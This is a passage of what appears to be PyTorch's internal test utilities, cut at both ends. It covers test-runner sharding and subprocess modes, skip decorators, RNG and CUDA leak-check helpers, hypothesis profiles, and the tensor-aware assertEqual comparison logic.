# https://github.com/python/cpython/blob/71b6c1af727fbe13525fb734568057d78cea33f3/Lib/subprocess.py#L309-L323
assert not isinstance(command, torch._six.string_classes), "Command to shell should be a list or tuple of tokens"
p = subprocess.Popen(command, universal_newlines=True, cwd=cwd, env=env)
return wait_for_process(p)
# Used to run the same test with different tensor types
def repeat_test_for_types(dtypes):
def repeat_helper(f):
@wraps(f)
def call_helper(self, *args):
for dtype in dtypes:
with TestCase.subTest(self, dtype=dtype):
f(self, *args, dtype=dtype)
return call_helper
return repeat_helper
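# Hedged usage sketch: applied to a TestCase method that accepts a `dtype`
# keyword, each dtype runs as its own subTest, e.g.
#
#     class MyTest(TestCase):
#         @repeat_test_for_types([torch.float, torch.double])
#         def test_add(self, dtype=torch.float):
#             x = torch.ones(2, dtype=dtype)
#             self.assertEqual((x + x).dtype, dtype)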
# Environment variable `IS_PYTORCH_CI` is set in `.jenkins/common.sh`.
IS_PYTORCH_CI = bool(os.environ.get('IS_PYTORCH_CI'))
def discover_test_cases_recursively(suite_or_case):
if isinstance(suite_or_case, unittest.TestCase):
return [suite_or_case]
rc = []
for element in suite_or_case:
rc.extend(discover_test_cases_recursively(element))
return rc
def get_test_names(test_cases):
return ['.'.join(case.id().split('.')[-2:]) for case in test_cases]
def chunk_list(lst, nchunks):
return [lst[i::nchunks] for i in range(nchunks)]
def run_tests(argv=UNITTEST_ARGS):
if TEST_DISCOVER:
suite = unittest.TestLoader().loadTestsFromModule(__main__)
test_cases = discover_test_cases_recursively(suite)
for name in get_test_names(test_cases):
print(name)
elif TEST_IN_SUBPROCESS:
suite = unittest.TestLoader().loadTestsFromModule(__main__)
test_cases = discover_test_cases_recursively(suite)
failed_tests = []
for case in test_cases:
test_case_full_name = case.id().split('.', 1)[1]
exitcode = shell([sys.executable] + argv + [test_case_full_name])
if exitcode != 0:
failed_tests.append(test_case_full_name)
assert len(failed_tests) == 0, "{} unit test(s) failed:\n\t{}".format(
len(failed_tests), '\n\t'.join(failed_tests))
elif RUN_PARALLEL > 1:
suite = unittest.TestLoader().loadTestsFromModule(__main__)
test_cases = discover_test_cases_recursively(suite)
test_batches = chunk_list(get_test_names(test_cases), RUN_PARALLEL)
processes = []
for i in range(RUN_PARALLEL):
command = [sys.executable] + argv + ['--log-suffix=-shard-{}'.format(i + 1)] + test_batches[i]
processes.append(subprocess.Popen(command, universal_newlines=True))
failed = False
for p in processes:
failed |= wait_for_process(p) != 0
assert not failed, "Some test shards have failed"
elif TEST_SAVE_XML is not None:
# import here so that non-CI doesn't need xmlrunner installed
import xmlrunner
test_report_path = TEST_SAVE_XML + LOG_SUFFIX
os.makedirs(test_report_path, exist_ok=True)
verbose = '--verbose' in argv or '-v' in argv
if verbose:
print('Test results will be stored in {}'.format(test_report_path))
unittest.main(argv=argv, testRunner=xmlrunner.XMLTestRunner(output=test_report_path, verbosity=2 if verbose else 1))
elif REPEAT_COUNT > 1:
for _ in range(REPEAT_COUNT):
if not unittest.main(exit=False, argv=argv).result.wasSuccessful():
sys.exit(-1)
else:
unittest.main(argv=argv)
IS_WINDOWS = sys.platform == "win32"
IS_MACOS = sys.platform == "darwin"
IS_PPC = platform.machine() == "ppc64le"
if IS_WINDOWS:
@contextmanager
def TemporaryFileName():
# Ideally we would like to not have to manually delete the file, but NamedTemporaryFile
# opens the file, and it cannot be opened multiple times in Windows. To support Windows,
# close the file after creation and try to remove it manually
f = tempfile.NamedTemporaryFile(delete=False)
try:
f.close()
yield f.name
finally:
os.unlink(f.name)
else:
@contextmanager # noqa: T484
def TemporaryFileName():
with tempfile.NamedTemporaryFile() as f:
yield f.name
def _check_module_exists(name):
r"""Returns if a top-level module with :attr:`name` exists *without**
importing it. This is generally safer than try-catch block around a
`import X`. It avoids third party libraries breaking assumptions of some of
our tests, e.g., setting multiprocessing start method when imported
(see librosa/#747, torchvision/#544).
"""
import importlib
import importlib.util
spec = importlib.util.find_spec(name)
return spec is not None
TEST_NUMPY = _check_module_exists('numpy')
TEST_SCIPY = _check_module_exists('scipy')
TEST_MKL = torch.backends.mkl.is_available()
TEST_NUMBA = _check_module_exists('numba')
TEST_DILL = _check_module_exists('dill')
TEST_LIBROSA = _check_module_exists('librosa')
# Python 2.7 doesn't have spawn
NO_MULTIPROCESSING_SPAWN = os.environ.get('NO_MULTIPROCESSING_SPAWN', '0') == '1'
TEST_WITH_ASAN = os.getenv('PYTORCH_TEST_WITH_ASAN', '0') == '1'
TEST_WITH_TSAN = os.getenv('PYTORCH_TEST_WITH_TSAN', '0') == '1'
TEST_WITH_UBSAN = os.getenv('PYTORCH_TEST_WITH_UBSAN', '0') == '1'
TEST_WITH_ROCM = os.getenv('PYTORCH_TEST_WITH_ROCM', '0') == '1'
# Enables tests that are slow to run (disabled by default)
TEST_WITH_SLOW = os.getenv('PYTORCH_TEST_WITH_SLOW', '0') == '1'
# Disables non-slow tests (these tests enabled by default)
# This is usually used in conjunction with TEST_WITH_SLOW to
# run *only* slow tests. (I could have done an enum, but
# it felt a little awkward.)
TEST_SKIP_FAST = os.getenv('PYTORCH_TEST_SKIP_FAST', '0') == '1'
if TEST_NUMPY:
import numpy as np
# Dict of NumPy dtype -> torch dtype (when the correspondence exists)
numpy_to_torch_dtype_dict = {
np.bool : torch.bool,
np.uint8 : torch.uint8,
np.int8 : torch.int8,
np.int16 : torch.int16,
np.int32 : torch.int32,
np.int64 : torch.int64,
np.float16 : torch.float16,
np.float32 : torch.float32,
np.float64 : torch.float64,
np.complex64 : torch.complex64,
np.complex128 : torch.complex128
}
# Dict of torch dtype -> NumPy dtype
torch_to_numpy_dtype_dict = {value : key for (key, value) in numpy_to_torch_dtype_dict.items()}
ALL_TENSORTYPES = [torch.float,
torch.double,
torch.half]
# bfloat16 bringup is currently only available on ROCm
# ALL_TENSORTYPES2 will eventually be unified with ALL_TENSORTYPES
# when bfloat16 bringup is complete on all platforms
if TEST_WITH_ROCM:
ALL_TENSORTYPES2 = [torch.float,
torch.double,
torch.half,
torch.bfloat16]
else:
ALL_TENSORTYPES2 = ALL_TENSORTYPES
def skipIfRocm(fn):
@wraps(fn)
def wrapper(*args, **kwargs):
if TEST_WITH_ROCM:
raise unittest.SkipTest("test doesn't currently work on the ROCm stack")
else:
fn(*args, **kwargs)
return wrapper
def skipIfCompiledWithoutNumpy(fn):
# Even if the numpy module is present, if `USE_NUMPY=0` is used during the
# build, numpy tests will fail
numpy_support = TEST_NUMPY
if numpy_support:
try:
# The numpy module is present, verify that PyTorch is compiled with
# numpy support
torch.from_numpy(np.array([2, 2]))
except RuntimeError:
numpy_support = False
@wraps(fn)
def wrapper(*args, **kwargs):
if not numpy_support:
raise unittest.SkipTest("PyTorch was compiled without numpy support")
else:
fn(*args, **kwargs)
return wrapper
def _test_function(fn, device):
def run_test_function(self):
return fn(self, device)
return run_test_function
def skipIfNoLapack(fn):
@wraps(fn)
def wrapper(*args, **kwargs):
if not torch._C.has_lapack:
raise unittest.SkipTest('PyTorch compiled without Lapack')
else:
fn(*args, **kwargs)
return wrapper
def skipIfNotRegistered(op_name, message):
"""Wraps the decorator to hide the import of the `core`.
Args:
op_name: Check if this op is registered in `core._REGISTERED_OPERATORS`.
message: message to fail with.
Usage:
@skipIfNotRegistered('MyOp', 'MyOp is not linked!')
This will check whether 'MyOp' is registered in caffe2.python.core._REGISTERED_OPERATORS.
"""
try:
from caffe2.python import core
skipper = unittest.skipIf(op_name not in core._REGISTERED_OPERATORS,
message)
except ImportError:
skipper = unittest.skip("Cannot import `caffe2.python.core`")
return skipper
def skipIfNoSciPy(fn):
@wraps(fn)
def wrapper(*args, **kwargs):
if not TEST_SCIPY:
raise unittest.SkipTest("test require SciPy, but SciPy not found")
else:
fn(*args, **kwargs)
return wrapper
def slowTest(fn):
@wraps(fn)
def wrapper(*args, **kwargs):
if not TEST_WITH_SLOW:
raise unittest.SkipTest("test is slow; run with PYTORCH_TEST_WITH_SLOW to enable test")
else:
fn(*args, **kwargs)
wrapper.__dict__['slow_test'] = True
return wrapper
def skipCUDAMemoryLeakCheckIf(condition):
def dec(fn):
if getattr(fn, '_do_cuda_memory_leak_check', True): # only if currently True
fn._do_cuda_memory_leak_check = not condition
return fn
return dec
def skipCUDANonDefaultStreamIf(condition):
def dec(fn):
if getattr(fn, '_do_cuda_non_default_stream', True): # only if currently True
fn._do_cuda_non_default_stream = not condition
return fn
return dec
def suppress_warnings(fn):
@wraps(fn)
def wrapper(*args, **kwargs):
with warnings.catch_warnings():
warnings.simplefilter("ignore")
fn(*args, **kwargs)
return wrapper
def get_cpu_type(type_name):
module, name = type_name.rsplit('.', 1)
assert module == 'torch.cuda'
return getattr(torch, name)
def get_gpu_type(type_name):
if isinstance(type_name, type):
type_name = '{}.{}'.format(type_name.__module__, type_name.__name__)
module, name = type_name.rsplit('.', 1)
assert module == 'torch'
return getattr(torch.cuda, name)
def to_gpu(obj, type_map=None):
if type_map is None:
type_map = {}
if isinstance(obj, torch.Tensor):
assert obj.is_leaf
t = type_map.get(obj.type(), get_gpu_type(obj.type()))
with torch.no_grad():
res = obj.clone().type(t)
res.requires_grad = obj.requires_grad
return res
elif torch.is_storage(obj):
return obj.new().resize_(obj.size()).copy_(obj)
elif isinstance(obj, list):
return [to_gpu(o, type_map) for o in obj]
elif isinstance(obj, tuple):
return tuple(to_gpu(o, type_map) for o in obj)
else:
return deepcopy(obj)
def get_function_arglist(func):
return inspect.getfullargspec(func).args
def set_rng_seed(seed):
torch.manual_seed(seed)
random.seed(seed)
if TEST_NUMPY:
np.random.seed(seed)
@contextlib.contextmanager
def freeze_rng_state():
rng_state = torch.get_rng_state()
if torch.cuda.is_available():
cuda_rng_state = torch.cuda.get_rng_state()
yield
if torch.cuda.is_available():
torch.cuda.set_rng_state(cuda_rng_state)
torch.set_rng_state(rng_state)
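# Hedged usage sketch: draws made inside freeze_rng_state do not perturb the
# RNG stream observed by the surrounding test, e.g.
#
#     with freeze_rng_state():
#         _ = torch.randn(3)        # consumes RNG state only inside the block
#     x = torch.randn(3)            # same values as if the block never ran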
@contextlib.contextmanager
def set_default_dtype(dtype):
saved_dtype = torch.get_default_dtype()
torch.set_default_dtype(dtype)
yield
torch.set_default_dtype(saved_dtype)
def iter_indices(tensor):
if tensor.dim() == 0:
return range(0)
if tensor.dim() == 1:
return range(tensor.size(0))
return product(*(range(s) for s in tensor.size()))
def is_iterable(obj):
try:
iter(obj)
return True
except TypeError:
return False
class CudaNonDefaultStream():
def __enter__(self):
# Before starting CUDA test save currently active streams on all
# CUDA devices and set new non default streams to all CUDA devices
# to ensure CUDA tests do not use default stream by mistake.
beforeDevice = torch.cuda.current_device()
self.beforeStreams = []
for d in range(torch.cuda.device_count()):
self.beforeStreams.append(torch.cuda.current_stream(d))
deviceStream = torch.cuda.Stream(device=d)
torch._C._cuda_setStream(deviceStream._cdata)
torch._C._cuda_setDevice(beforeDevice)
def __exit__(self, exec_type, exec_value, traceback):
# After completing CUDA test load previously active streams on all
# CUDA devices.
beforeDevice = torch.cuda.current_device()
for d in range(torch.cuda.device_count()):
torch._C._cuda_setStream(self.beforeStreams[d]._cdata)
torch._C._cuda_setDevice(beforeDevice)
class CudaMemoryLeakCheck():
def __init__(self, testcase, name=None):
self.name = testcase.id() if name is None else name
self.testcase = testcase
# initialize context & RNG to prevent false positive detections
# when the test is the first to initialize those
from torch.testing._internal.common_cuda import initialize_cuda_context_rng
initialize_cuda_context_rng()
@staticmethod
def get_cuda_memory_usage():
# We don't need to synchronize CUDA because the statistics are not tracked
# when a block is actually freed, but when it is marked as free.
num_devices = torch.cuda.device_count()
gc.collect()
return tuple(torch.cuda.memory_allocated(i) for i in range(num_devices))
def __enter__(self):
self.befores = self.get_cuda_memory_usage()
def __exit__(self, exec_type, exec_value, traceback):
# Don't check for leaks if an exception was thrown
if exec_type is not None:
return
afters = self.get_cuda_memory_usage()
for i, (before, after) in enumerate(zip(self.befores, afters)):
self.testcase.assertEqual(
before, after, msg='{} leaked {} bytes CUDA memory on device {}'.format(
self.name, after - before, i))
# "min_satisfying_examples" setting has been deprecated in hypythesis
# 3.56.0 and removed in hypothesis 4.x
try:
import hypothesis
def settings(*args, **kwargs):
if 'min_satisfying_examples' in kwargs and hypothesis.version.__version_info__ >= (3, 56, 0):
kwargs.pop('min_satisfying_examples')
return hypothesis.settings(*args, **kwargs)
hypothesis.settings.register_profile(
"pytorch_ci",
settings(
derandomize=True,
suppress_health_check=[hypothesis.HealthCheck.too_slow],
database=None,
max_examples=100,
verbosity=hypothesis.Verbosity.normal))
hypothesis.settings.register_profile(
"dev",
settings(
suppress_health_check=[hypothesis.HealthCheck.too_slow],
database=None,
max_examples=10,
verbosity=hypothesis.Verbosity.normal))
hypothesis.settings.register_profile(
"debug",
settings(
suppress_health_check=[hypothesis.HealthCheck.too_slow],
database=None,
max_examples=1000,
verbosity=hypothesis.Verbosity.verbose))
hypothesis.settings.load_profile(
"pytorch_ci" if IS_PYTORCH_CI else os.getenv('PYTORCH_HYPOTHESIS_PROFILE',
'dev')
)
except ImportError:
print('Failed to import hypothesis in common_utils, tests are not derandomized')
disabled_test_from_issues = None
def check_disabled(test_name):
global disabled_test_from_issues
if disabled_test_from_issues is None:
disabled_test_from_issues = {}
def read_and_process():
url = 'https://raw.githubusercontent.com/zdevito/pytorch_disabled_tests/master/result.json'
contents = urlopen(url, timeout=1).read().decode('utf-8')
the_response = json.loads(contents)
for item in the_response['items']:
title = item['title']
key = 'DISABLED '
if title.startswith(key):
test_name = title[len(key):].strip()
disabled_test_from_issues[test_name] = item['html_url']
if not IS_SANDCASTLE and os.getenv("PYTORCH_RUN_DISABLED_TESTS", "0") != "1":
try:
read_and_process()
except Exception:
print("Couldn't download test skip set, leaving all tests enabled...")
if test_name in disabled_test_from_issues:
raise unittest.SkipTest(
"Test is disabled because an issue exists disabling it: {}".format(disabled_test_from_issues[test_name]) +
" To enable set the environment variable PYTORCH_RUN_DISABLED_TESTS=1")
# Acquires the comparison dtype, required since isclose
# requires both inputs to have the same dtype, and isclose is not supported
# for some device x dtype combinations.
# NOTE: Remaps bfloat16 to float32 since neither the CPU nor CUDA device types
# support needed bfloat16 comparison methods.
# NOTE: Remaps float16 to float32 on CPU since the CPU device type doesn't
# support needed float16 comparison methods.
# TODO: Update this once bfloat16 and float16 are better supported.
def get_comparison_dtype(a, b):
# TODO: update this when promote_types supports bfloat16 and/or
# isclose supports bfloat16.
a_dtype = torch.float32 if a.dtype is torch.bfloat16 else a.dtype
b_dtype = torch.float32 if b.dtype is torch.bfloat16 else b.dtype
compare_dtype = torch.promote_types(a_dtype, b_dtype)
# non-CUDA (CPU, for example) float16 -> float32
# TODO: update this when isclose is implemented for CPU float16
if (compare_dtype is torch.float16 and
(a.device != b.device or a.device.type != 'cuda' or
b.device.type != 'cuda')):
compare_dtype = torch.float32
return compare_dtype
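# Hedged illustration: comparing a bfloat16 tensor against a float32 tensor
# remaps both sides so the comparison happens in float32, e.g.
#
#     a = torch.tensor([1.0], dtype=torch.bfloat16)
#     b = torch.tensor([1.0], dtype=torch.float32)
#     get_comparison_dtype(a, b)    # -> torch.float32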
class TestCase(expecttest.TestCase):
# NOTE: "precision" lets classes and generated tests set minimum
# atol values when comparing tensors. Used by @precisionOverride, for
# example.
# TODO: provide a better mechanism for generated tests to set rtol/atol.
_precision: float = 0
@property
def precision(self) -> float:
return self._precision
@precision.setter
def precision(self, prec: float) -> None:
self._precision = prec
_do_cuda_memory_leak_check = False
_do_cuda_non_default_stream = False
def __init__(self, method_name='runTest'):
super().__init__(method_name)
test_method = getattr(self, method_name, None)
if test_method is not None:
# Wraps the tested method if we should do CUDA memory check.
self._do_cuda_memory_leak_check &= getattr(test_method, '_do_cuda_memory_leak_check', True)
# FIXME: figure out the flaky -1024 anti-leaks on windows. See #8044
if self._do_cuda_memory_leak_check and not IS_WINDOWS:
self.wrap_with_cuda_policy(method_name, self.assertLeaksNoCudaTensors)
# Wraps the tested method if we should enforce non default CUDA stream.
self._do_cuda_non_default_stream &= getattr(test_method, '_do_cuda_non_default_stream', True)
if self._do_cuda_non_default_stream and not IS_WINDOWS and not TEST_WITH_ROCM:
self.wrap_with_cuda_policy(method_name, self.enforceNonDefaultStream)
def assertLeaksNoCudaTensors(self, name=None):
name = self.id() if name is None else name
return CudaMemoryLeakCheck(self, name)
def enforceNonDefaultStream(self):
return CudaNonDefaultStream()
def wrap_with_cuda_policy(self, method_name, policy):
test_method = getattr(self, method_name)
# the import below may initialize CUDA context, so we do it only if
# self._do_cuda_memory_leak_check or self._do_cuda_non_default_stream
# is True.
from torch.testing._internal.common_cuda import TEST_CUDA
fullname = self.id().lower() # class_name.method_name
if TEST_CUDA and ('gpu' in fullname or 'cuda' in fullname):
setattr(self, method_name, self.wrap_method_with_cuda_policy(test_method, policy))
def wrap_method_with_cuda_policy(self, method, policy):
# Assumes that `method` is the tested function in `self`.
# NOTE: Python exceptions (e.g., unittest.SkipTest) keep objects in scope
# alive, so this cannot be done in setUp and tearDown because
# tearDown is run unconditionally no matter whether the test
# passes or not. For the same reason, we can't wrap the `method`
# call in try-finally and always do the check.
@wraps(method)
def wrapper(self, *args, **kwargs):
with policy():
method(*args, **kwargs)
return types.MethodType(wrapper, self)
def wrap_with_cuda_memory_check(self, method):
return self.wrap_method_with_cuda_policy(method, self.assertLeaksNoCudaTensors)
def setUp(self):
if TEST_SKIP_FAST:
if not getattr(self, self._testMethodName).__dict__.get('slow_test', False):
raise unittest.SkipTest("test is fast; we disabled it with PYTORCH_TEST_SKIP_FAST")
check_disabled(str(self))
set_rng_seed(SEED)
def genSparseTensor(self, size, sparse_dim, nnz, is_uncoalesced, device='cpu'):
# Assert we are not given an impossible combination, where the sparse dims
# have empty numel but nnz > 0 would require the indices to contain values.
assert all(size[d] > 0 for d in range(sparse_dim)) or nnz == 0, 'invalid arguments'
v_size = [nnz] + list(size[sparse_dim:])
v = torch.randn(*v_size, device=device)
i = torch.rand(sparse_dim, nnz, device=device)
i.mul_(torch.tensor(size[:sparse_dim]).unsqueeze(1).to(i))
i = i.to(torch.long)
if is_uncoalesced:
v = torch.cat([v, torch.randn_like(v)], 0)
i = torch.cat([i, i], 1)
x = torch.sparse_coo_tensor(i, v, torch.Size(size))
if not is_uncoalesced:
x = x.coalesce()
else:
# FIXME: `x` is a sparse view of `v`. Currently rebase_history for
# sparse views is not implemented, so this workaround is
# needed for inplace operations done on `x`, e.g., copy_().
# Remove after implementing something equivalent to CopySlice
# for sparse views.
# NOTE: We do clone() after detach() here because we need to be able to change size/storage of x afterwards
x = x.detach().clone()
return x, x._indices().clone(), x._values().clone()
def safeToDense(self, t):
r = self.safeCoalesce(t)
return r.to_dense()
def safeCoalesce(self, t):
tc = t.coalesce()
self.assertEqual(tc.to_dense(), t.to_dense())
self.assertTrue(tc.is_coalesced())
# Our code below doesn't work when nnz is 0, because
# then it's a 0D tensor, not a 2D tensor.
if t._nnz() == 0:
self.assertEqual(t._indices(), tc._indices())
self.assertEqual(t._values(), tc._values())
return tc
value_map = {}
for idx, val in zip(t._indices().t(), t._values()):
idx_tup = tuple(idx.tolist())
if idx_tup in value_map:
value_map[idx_tup] += val
else:
value_map[idx_tup] = val.clone() if isinstance(val, torch.Tensor) else val
new_indices = sorted(list(value_map.keys()))
new_values = [value_map[idx] for idx in new_indices]
if t._values().ndimension() < 2:
new_values = t._values().new(new_values)
else:
new_values = torch.stack(new_values)
new_indices = t._indices().new(new_indices).t()
tg = t.new(new_indices, new_values, t.size())
self.assertEqual(tc._indices(), tg._indices())
self.assertEqual(tc._values(), tg._values())
if t.is_coalesced():
self.assertEqual(tc._indices(), t._indices())
self.assertEqual(tc._values(), t._values())
return tg
# Compares the given Torch and NumPy functions on the given tensor-like object.
# NOTE: both torch_fn and np_fn should be functions that take a single
# tensor (array). If the torch and/or NumPy function require additional
# arguments then wrap the function in a lambda or pass a partial function.
# TODO: support bfloat16 comparisons
# TODO: add args/kwargs for passing to assertEqual (e.g. rtol, atol)
def compare_with_numpy(self, torch_fn, np_fn, tensor_like, device=None, dtype=None):
assert TEST_NUMPY
assert dtype is not torch.bfloat16
if isinstance(tensor_like, torch.Tensor):
assert device is None
assert dtype is None
a = tensor_like.detach().cpu().numpy()
t = tensor_like
else:
a = np.array(tensor_like, dtype=torch_to_numpy_dtype_dict[dtype])
t = torch.tensor(tensor_like, device=device, dtype=dtype)
np_result = np_fn(a)
torch_result = torch_fn(t).cpu()
# Converts arrays to tensors
if isinstance(np_result, np.ndarray):
try:
np_result = torch.from_numpy(np_result)
except Exception:
# NOTE: copying an array before conversion is necessary when,
# for example, the array has negative strides.
np_result = torch.from_numpy(np_result.copy())
self.assertEqual(np_result, torch_result)
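# Hedged usage sketch: when the compared functions need extra arguments, wrap
# them in a lambda or functools.partial as the NOTE above suggests, e.g.
#
#     self.compare_with_numpy(lambda t: torch.clamp(t, min=0),
#                             lambda a: np.clip(a, 0, None),
#                             [-1.0, 0.5, 2.0],
#                             device='cpu', dtype=torch.float32)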
# Some analysis of tolerance by logging tests from test_torch.py can be found
# in https://github.com/pytorch/pytorch/pull/32538.
# dtype name : (rtol, atol)
dtype_precisions = {
torch.float16 : (0.001, 1e-5),
torch.bfloat16 : (0.016, 1e-5),
torch.float32 : (1.3e-6, 1e-5),
torch.float64 : (1e-7, 1e-7),
torch.complex32 : (0.001, 1e-5),
torch.complex64 : (1.3e-6, 1e-5),
torch.complex128 : (1e-7, 1e-7),
}
# Returns the "default" rtol and atol for comparing scalars or
# tensors of the given dtypes.
def _getDefaultRtolAndAtol(self, dtype0, dtype1):
rtol = max(self.dtype_precisions.get(dtype0, (0, 0))[0],
self.dtype_precisions.get(dtype1, (0, 0))[0])
atol = max(self.dtype_precisions.get(dtype0, (0, 0))[1],
self.dtype_precisions.get(dtype1, (0, 0))[1])
return rtol, atol
# Checks if two dense tensors are equal(-ish), returning (True, None)
# when they are and (False, debug_msg) when they are not.
# If exact_dtype is true both tensors must have the same dtype.
# If exact_device is true both tensors must be on the same device.
# See the "Test Framework Tensor 'Equality'" note for more details.
# NOTE: tensors on different devices are moved to the CPU to be compared when
# exact_device is False.
# NOTE: this function checks the tensors' devices, sizes, and dtypes
# and acquires the appropriate device, dtype, rtol and atol to compare
# them with. It then calls _compare_tensors_internal.
def _compareTensors(self, a, b, *, rtol: Optional[float] = None, atol=None, equal_nan=True,
exact_dtype=True, exact_device=False) -> _compare_return_type:
assert (atol is None) == (rtol is None)
if not isinstance(a, torch.Tensor):
return (False, "argument a, {0}, to _compareTensors is not a tensor!".format(a))
if not isinstance(b, torch.Tensor):
return (False, "argument b, {0}, to _compareTensors is not a tensor!".format(b))
# Validates tensors are on the same device
if exact_device and a.device != b.device:
return (False, ("Attempted to compare equality of tensors on "
"different devices! Got devices {0} and "
"{1}.".format(a.device, b.device)))
# Compares tensors of different devices on the CPU
if a.device != b.device:
a = a.cpu()
b = b.cpu()
# Checks size matches
if a.size() != b.size():
return (False, ("Attempted to compare equality of tensors with "
"different sizes. Got sizes {0} and {1}.").format(a.size(), b.size()))
# Checks dtype (if exact_dtype)
if exact_dtype and a.dtype is not b.dtype:
return (False, ("Attempted to compare equality of tensors with "
"different dtypes. Got dtypes {0} and {1}.").format(a.dtype, b.dtype))
# Acquires rtol and atol
if rtol is None:
rtol, atol = self._getDefaultRtolAndAtol(a.dtype, b.dtype)
atol = max(atol, self.precision)
# Converts to comparison dtype
dtype = get_comparison_dtype(a, b)
a = a.to(dtype)
b = b.to(dtype)
return _compare_tensors_internal(a, b, rtol=rtol, atol=atol, equal_nan=equal_nan)
# Checks if two scalars are equal(-ish), returning (True, None)
# when they are and (False, debug_msg) when they are not.
# NOTE: this function just acquires rtol and atol
# before calling _compare_scalars_internal.
def _compareScalars(self, a, b, *,
rtol: Optional[float] = None, atol: Optional[float] = None, equal_nan=True) -> _compare_return_type:
# Acquires rtol and atol
assert (atol is None) == (rtol is None)
if rtol is None:
if isinstance(a, complex) or isinstance(b, complex):
rtol, atol = self._getDefaultRtolAndAtol(torch.complex64, torch.complex64)
elif isinstance(a, float) or isinstance(b, float):
rtol, atol = self._getDefaultRtolAndAtol(torch.float32, torch.float32)
else:
rtol, atol = 0, 0
atol = max(atol, self.precision)
return _compare_scalars_internal(a, b, rtol=cast(float, rtol), atol=cast(float, atol), equal_nan=equal_nan)
def assertEqualIgnoreType(self, *args, **kwargs) -> None:
# If you are seeing this function used, that means the test is written
# incorrectly and deserves detailed investigation
return self.assertEqual(*args, exact_dtype=False, **kwargs)
# Compares x and y
# TODO: default exact_device to True
def assertEqual(self, x, y, msg: Optional[str] = None, *,
atol: Optional[float] = None, rtol: Optional[float] = None,
equal_nan=True, exact_dtype=True, exact_device=False) -> None:
assert (atol is None) == (rtol is None), "If one of atol or rtol is specified the other must be, too"
# Tensor x Number and Number x Tensor comparisons
if isinstance(x, torch.Tensor) and isinstance(y, Number):
self.assertEqual(x.item(), y, atol=atol, rtol=rtol, msg=msg,
exact_dtype=exact_dtype, exact_device=exact_device)
elif isinstance(y, torch.Tensor) and isinstance(x, Number):
self.assertEqual(x, y.item(), atol=atol, rtol=rtol, msg=msg,
exact_dtype=exact_dtype, exact_device=exact_device)
# Tensor x np.bool
elif isinstance(x, torch.Tensor) and isinstance(y, np.bool_):
self.assertEqual(x.item(), y, atol=atol, rtol=rtol, msg=msg,
exact_dtype=exact_dtype, exact_device=exact_device)
elif isinstance(y, torch.Tensor) and isinstance(x, np.bool_):
self.assertEqual(x, y.item(), atol=atol, rtol=rtol, msg=msg,
exact_dtype=exact_dtype, exact_device=exact_device)
# Tensor x Tensor
elif isinstance(x, torch.Tensor) and isinstance(y, torch.Tensor):
super().assertEqual(x.is_sparse, y.is_sparse, msg=msg)
super().assertEqual(x.is_quantized, y.is_quantized, msg=msg)
if x.is_sparse:
x = self.safeCoalesce(x)
y = self.safeCoalesce(y)
indices_result, debug_msg = self._compareTensors(x._indices(), y._indices(),
rtol=rtol, atol=atol,
equal_nan=equal_nan, exact_dtype=exact_dtype,
exact_device=exact_device)
if not indices_result and msg is None:
assert debug_msg is not None
msg = "Sparse tensor indices failed to compare as equal! " + debug_msg
self.assertTrue(indices_result, msg=msg)
values_result, debug_msg = self._compareTensors(x._values(), y._values(),
rtol=rtol, atol=atol,
equal_nan=equal_nan, exact_dtype=exact_dtype,
exact_device=exact_device)
if not values_result and msg is None:
assert debug_msg is not None
msg = "Sparse tensor values failed to compare as equal! " + debug_msg
self.assertTrue(values_result, msg=msg)
elif x.is_quantized and y.is_quantized:
self.assertEqual(x.qscheme(), y.qscheme(), atol=atol, rtol=rtol,
msg=msg, exact_dtype=exact_dtype,
exact_device=exact_device)
if x.qscheme() == torch.per_tensor_affine:
self.assertEqual(x.q_scale(), y.q_scale(), atol=atol, rtol=rtol,
msg=msg, exact_dtype=exact_dtype,
exact_device=exact_device)
self.assertEqual(x.q_zero_point(), y.q_zero_point(),
atol=atol, rtol=rtol, msg=msg,
exact_dtype=exact_dtype, exact_device=exact_device)
elif x.qscheme() == torch.per_channel_affine:
self.assertEqual(x.q_per_channel_scales(), y.q_per_channel_scales(), atol=atol, rtol=rtol,
msg=msg, exact_dtype=exact_dtype,
exact_device=exact_device)
self.assertEqual(x.q_per_channel_zero_points(), y.q_per_channel_zero_points(),
atol=atol, rtol=rtol, msg=msg,
exact_dtype=exact_dtype, exact_device=exact_device)
self.assertEqual(x.q_per_channel_axis(), y.q_per_channel_axis(),
atol=atol, rtol=rtol, msg=msg,
exact_dtype=exact_dtype, exact_device=exact_device)
result, debug_msg = self._compareTensors(x.int_repr().to(torch.int32),
y.int_repr().to(torch.int32),
atol=atol, rtol=rtol,
exact_dtype=exact_dtype,
exact_device=exact_device)
if not result and msg is None:
assert debug_msg is not None
msg = "Quantized representations failed to compare as equal! " + debug_msg
self.assertTrue(result, msg=msg)
else:
result, debug_msg = self._compareTensors(x, y, rtol=rtol, atol=atol,
equal_nan=equal_nan, exact_dtype=exact_dtype,
exact_device=exact_device)
if not result and msg is None:
assert debug_msg is not None
msg = "Tensors failed to compare as equal! " + debug_msg
self.assertTrue(result, msg=msg)
elif isinstance(x, string_classes) and isinstance(y, string_classes):
super().assertEqual(x, y, msg=msg)
elif type(x) == set and type(y) == set:
super().assertEqual(x, y, msg=msg)
elif isinstance(x, dict) and isinstance(y, dict):
if isinstance(x, OrderedDict) and isinstance(y, OrderedDict):
self.assertEqual(x.items(), y.items(), atol=atol, rtol=rtol,
msg=msg, exact_dtype=exact_dtype,
exact_device=exact_device)
else:
self.assertEqual(set(x.keys()), set(y.keys()), atol=atol, rtol=rtol,
msg=msg, exact_dtype=exact_dtype,
exact_device=exact_device)
key_list = list(x.keys())
self.assertEqual([x[k] for k in key_list],
[y[k] for k in key_list],
atol=atol, rtol=rtol, msg=msg,
exact_dtype=exact_dtype, exact_device=exact_device)
elif isinstance(x, type) and isinstance(y, type):
# See TestTorch.test_assert_equal_generic_meta
super().assertEqual(x, y, msg=msg)
elif is_iterable(x) and is_iterable(y):
super().assertEqual(len(x), len(y), msg=msg)
for x_, y_ in zip(x, y):
self.assertEqual(x_, y_, atol=atol, rtol=rtol, msg=msg,
exact_dtype=exact_dtype, exact_device=exact_device)
elif isinstance(x, bool) and isinstance(y, bool):
self.assertTrue(x == y, msg=msg)
# Scalar x Scalar
elif isinstance(x, Number) and isinstance(y, Number):
result, debug_msg = self._compareScalars(x, y, rtol=rtol, atol=atol,
equal_nan=equal_nan)
if not result and msg is None:
assert debug_msg is not None
msg = "Scalars failed to compare as equal! " + debug_msg
self.assertTrue(result, msg=msg)
else:
super().assertEqual(x, y, msg=msg)
def assertAlmostEqual(self, x, y, *, places=None, msg=None, delta=None):
prec = delta
if places:
prec = 10**(-places)
